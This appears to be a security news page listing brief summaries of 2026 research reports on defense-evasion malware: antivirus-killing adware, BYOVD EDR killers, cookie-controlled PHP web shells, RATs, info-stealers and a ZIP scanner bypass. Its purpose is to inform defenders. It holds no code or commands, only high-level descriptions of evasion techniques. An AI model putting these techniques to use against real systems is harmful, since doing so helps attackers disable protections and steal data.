All news with #defense evasion tag

🔒 Huntress researchers uncovered a digitally signed adware campaign that deployed SYSTEM‑privilege payloads to disable antivirus protections on thousands of endpoints. The binaries, signed by Dragon Boss Solutions LLC and bundled in browser-like PUPs such as Chromstera and WorldWideWeb, used an Advanced Installer MSI to drop a PowerShell script, ClockRemoval.ps1, which stops services, uninstalls AVs, edits the hosts file and persists via WMI and scheduled tasks. After registering the operator’s unclaimed update domain, Huntress sinkholed infrastructure and observed over 23,500 infected hosts checking in across 124 countries, including hundreds in high-value networks. Administrators are urged to search for specific WMI subscriptions, scheduled tasks, blocked vendor domains in hosts, and processes signed by the publisher.

⚠️ Huntress has identified a signed adware operation linked to Dragon Boss Solutions LLC that has disabled antivirus products on approximately 23,565 endpoints worldwide. The campaign leverages a legitimate code‑signing certificate and an MSI update mechanism to deploy a PowerShell payload, ClockRemoval.ps1, which systematically kills, uninstalls and blocks reinstallation of AVs. Targets include Malwarebytes, Kaspersky, McAfee and ESET, and persistence is maintained via scheduled tasks and WMI event subscriptions. Researchers sinkholed an unregistered update domain and observed infections across 124 countries, including universities, utilities and government networks.

🔐 eSentire's Threat Response Unit identified a previously undocumented remote access trojan, STX RAT, after an attempted deployment in a financial services environment in late February 2026. The malware uses multi-stage, script-based delivery and in-memory execution to evade detection, leveraging XXTEA encryption, Zlib compression and reflective PowerShell loaders. It delays credential theft until instructed by an encrypted C2 channel and implements registry autoruns and COM hijacking for persistence. Organizations should strengthen endpoint protections and limit exposure to script-based attack vectors.

🔐 Lumen's Black Lotus Labs and Microsoft linked a campaign named FrostArmada to APT28 (aka Forest Blizzard), which compromised insecure MikroTik and TP‑Link SOHO routers to change DNS settings and route traffic to attacker-controlled resolvers. The actors used DNS hijacking to perform passive reconnaissance and attacker-in-the-middle (AitM) operations to harvest passwords, OAuth tokens, and other credentials without user interaction. The malicious infrastructure has been disrupted in a multi‑agency operation led by the U.S. Department of Justice and FBI with international partners.

🔒 Cisco Talos and Trend Micro say Qilin and Warlock ransomware groups have adopted a bring-your-own vulnerable driver (BYOVD) approach to disable endpoint security on compromised hosts. Talos identified a malicious DLL named msimg32.dll that side-loads a PE loader which decrypts and executes an in-memory EDR killer. The payload leverages renamed drivers such as rwdrv.sys (a repackaged ThrottleStop.sys) and hlpdrv.sys to access physical memory and terminate over 300 EDR drivers. Warlock has similarly used NSecKrnl.sys and a suite of legitimate tools to persist, move laterally, and exfiltrate data.

🍪 Microsoft Defender Security Research Team warns that threat actors are increasingly using HTTP cookies as a covert control channel for PHP-based web shells on Linux servers. Instead of passing commands via URL parameters or request bodies, attackers gate execution and convey instructions through values accessible in the PHP $_COOKIE superglobal. This technique keeps malicious code dormant during normal application activity and activates only when specific cookie values are present, reducing observable indicators. Microsoft observed multiple obfuscated loaders and a cron-driven 'self-healing' persistence model that recreates loaders and minimizes forensic visibility.

🔒 Threat actors are increasingly abusing HTTP cookies as a stealthy control channel for PHP webshells on Linux hosting platforms. By gating execution on specific cookie values, attackers keep loaders dormant during normal traffic and activate functionality only when exact cookie conditions are met. Variants range from multi-stage loaders that reconstruct functions at runtime to single-file interactive shells, often using base64 reconstruction and layered obfuscation to evade detection. Review Microsoft Defender guidance to detect, hunt, and mitigate these threats.

🔍 This Talos analysis dissects a malicious msimg32.dll used in Qilin ransomware attacks, detailing a multi-stage PE loader that evades and disables endpoint detection and response (EDR) solutions. The loader employs SEH/VEH obfuscation, syscall-stub reuse, and paging-file-backed sections to decrypt and map payloads entirely in memory without triggering hooks or ETW telemetry. The final EDR killer loads two helper drivers to perform physical memory R/W and to unprotect and terminate guarded processes, enabling it to neutralize over 300 vendor drivers.

🔒 The 2026 State of the SOC Report, based on more than 909,000 alerts observed via the Adlumin MDR at the N-able SOC between March and December 2025, lays out five practical steps to preserve operations when attackers strike. It urges layered, defense-in-depth designs that combine identity, endpoint, network, cloud, and perimeter visibility rather than relying on single-point solutions. The guidance highlights automation and SOAR to move containment and remediation to machine speed, modernized endpoint and ITDR identity controls to detect credential abuse, validated immutable backups to enable rapid recovery, and rigorous oversight of AI-driven processes to manage emerging attack surfaces.

⚠️ Apple has introduced a new security measure in macOS Tahoe 26.4 that delays execution when users paste commands into Terminal and displays a warning highlighting potential risks. The mechanism appears aimed at mitigating ClickFix social‑engineering attacks that trick users into pasting malicious commands. Users may cancel the paste or choose to proceed if they understand the command, and Apple has not yet published official documentation for the behavior.

🔒eSentire researchers disclosed on March 25 that a new campaign using a Node.js backdoor, dubbed EtherRAT, leverages Ethereum smart contracts to conceal command-and-control infrastructure. The technique, referred to as EtherHiding, stores C2 addresses on-chain and enables operators to rotate servers cheaply. The malware retrieves contract data via public RPC providers, mimics CDN traffic to blend in, collects detailed system fingerprints and steals cryptocurrency wallets and cloud credentials. Organizations are advised to restrict risky Windows utilities, train staff against IT support scams and consider blocking common crypto RPC endpoints.

🔒 Security researchers warn that the Iran-linked Pay2Key ransomware group has re-emerged with enhanced evasion, execution and anti-forensics capabilities. A Halcyon and Beazley Security analysis of a recent US healthcare provider incident describes interactive access via TeamViewer, credential theft with Mimikatz, LaZagne and ExtPassword, and host discovery using Advanced IP Scanner and ns.exe. Operators used the AD console (dsa.msc) to blend in, deployed an SFX payload (abc.exe) to encrypt systems within three hours, and removed a 'No Defender' toolkit to hide tracks. Report authors found no clear evidence of data exfiltration and warn defenders to monitor this unpredictable, politically motivated threat.

🔒 Gen Digital researchers describe a rapidly evolving info‑stealer named Torg Grabber that exfiltrates data from 850 browser extensions, including 728 cryptocurrency wallets. Initial access commonly uses a clipboard hijack and a ClickFix PowerShell trick; the payload runs in memory via reflective loading, direct syscalls and heavy obfuscation. Operators migrated exfiltration to HTTPS through Cloudflare and added an App‑Bound Encryption bypass to harvest Chromium cookie data.

🔎 Cybersecurity researchers analyzed Predator, a commercial spyware component developed by Intellexa, and revealed how it disables iOS camera and microphone recording indicators. The malware intercepts communications between the system component that tracks module activity and SpringBoard, exploiting Objective‑C behavior to suppress status signals so the green/orange dots never appear. The report outlines the techniques, traces earlier dead code attempts, and offers practical mitigations for users at elevated risk.

🔒 A new ESET analysis identified 54 EDR-killer tools that leverage BYOVD, abusing 34 signed vulnerable drivers to gain kernel-mode privileges and neutralize endpoint protection. These utilities are frequently reused in ransomware operations to disable defenses prior to encryption, decoupling evasion from the encryptor. ESET recommends blocking misused drivers and adopting layered detection to mitigate the threat.

🔍 Group-IB's March 19 report exposes operational details of the Gentlemen ransomware group after an affiliate known as hastalamuerte leaked internal information. The research describes a rapidly evolving RaaS that sprang from a Qilin ecosystem dispute and leverages a dual-extortion model, cross-platform encryption and automated lateral movement to maximize impact. Primary initial access stems from exposed FortiGate VPN devices, while advanced evasion such as BYOVD and aggressive log deletion are used to frustrate defenders and forensic analysis.

🔍 Exfiltration Framework examines how attackers repurpose legitimate OS utilities, third-party endpoint tools, and cloud clients to move sensitive data while evading traditional detections. The research shows that static IOCs and tool-blocking strategies are frequently ineffective when adversaries operate inside trusted software and infrastructure. By normalizing execution context, parent-child process relationships, network patterns, forensic artifacts, and destination characteristics, the framework exposes stable behavioral signals that persist despite masquerading, renaming, or relocation. It recommends correlating endpoint, network, and cloud telemetry, applying behavioral baselining, and focusing on cumulative transfer analysis rather than single-event or allow-list approaches.

🔒 ESET's research examines the prevalence and mechanics of EDR killers—separate tools attackers deploy to neutralize endpoint protection immediately before executing encryptors. Based on telemetry and incident analysis of nearly 90 active samples, the blogpost covers BYOVD, anti-rootkit abuse, driverless disruption, commercialization of kits, and indicators suggestive of AI-assisted development. The authors highlight predictable affiliate-driven tooling choices and warn that driver-based attribution is often misleading; they recommend prevention-focused, multilayered defenses and rapid containment.

🧟 Researchers disclosed a technique called 'Zombie ZIP' that manipulates ZIP headers to hide DEFLATE-compressed payloads so scanners treat them as uncompressed, producing widespread false negatives in antivirus and EDR tools. The author, Chris Aziz of Bombadil Systems, published proof-of-concept archives showing scanners trust the ZIP Method field and therefore scan raw bytes instead of compressed data. CERT/CC assigned CVE-2026-0866 and recommends stricter archive validation; end users should delete archives that raise 'unsupported method' or extraction errors.

📄 Researchers at Aryaka report a campaign distributing malicious resumés with ISO attachments to HR teams. When mounted, an included .lnk executes obfuscated PowerShell that extracts payloads from steganographic images and sideloads a DLL via a signed app. The malware includes a module called BlackSanta and leverages a BYOVD technique to disable EDR. Organizations should restrict resume formats and harden HR processes.